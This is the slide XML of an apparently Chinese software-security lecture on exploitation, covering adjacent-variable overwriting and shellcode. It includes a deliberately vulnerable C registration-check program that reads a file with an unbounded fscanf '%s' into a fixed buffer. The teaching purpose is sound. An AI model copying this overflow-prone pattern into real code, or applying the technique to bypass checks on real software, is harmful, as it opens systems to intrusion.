                <a:gd name="connsiteY6" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX7" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX8" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX9" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX13" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1859709 h 1955081"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1955081 h 1955081"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1716692 h 195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1">
                  <a:moveTo>
                    <a:pt x="0" y="1716692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716692"/>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0" name="任意多边形: 形状 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F697906-39C1-47C3-ADE4-53420E13B68E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="275598" y="4800693"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1478222 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1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1403883" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F87891-8299-4375-87F6-4940389DCE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819" y="0"/>
            <a:ext cx="11875110" cy="7232650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202711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AD2B354-15D3-4C8A-85D2-33CEBD4C936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/2/9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5F0C88-FD5F-4486-9D89-3C4F82CAA17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7E7975B-E11E-4432-97B8-B813496B2D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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802390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6">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/2/9</a:t>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872" r:id="rId1"/>
    <p:sldLayoutId id="2147483873"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30755" y="34486"/>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676847" y="1327098"/>
            <a:ext cx="10657184" cy="4647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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第五章   漏洞利用</a:t>
            </a:r>
            <a:endPar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知识点一：漏洞利用概念</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知识点二：覆盖临接变量示例</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知识点三：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="440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Shellcode</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代码植入示例</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知识点四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="440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Shellcode</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编写</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知识点五：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="440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Shellcode</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编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29377052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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089115" y="736005"/>
            <a:ext cx="4680520" cy="637540"/>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000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>假设其主程序启动时候要校验注册码：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BFEC09-C411-4C8D-A681-0E601F34CB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2504939" y="1384077"/>
            <a:ext cx="7848872" cy="5475350"/>
            <a:chOff x="2468935" y="2717510"/>
            <a:chExt cx="7848872" cy="5475350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3060969" y="2750536"/>
              <a:ext cx="6716778" cy="5442324"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>void main(){</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	int </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>vFlag</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>=0;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	char </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>regcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>[1024];</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	FILE *</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>LoadLibrary</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>("user32.dll");</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	if (!(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fopen</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>("reg.txt","</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>+")))   exit(0); </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fscanf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>,"%s", </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>regcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>vFlag</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>=verify(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>regcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	if (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>vFlag</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>)   </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="3" algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>("wrong </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>regcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>!");</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	else   </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="3" algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>("passed!"); </a:t>
              </a:r>
            </a:p>
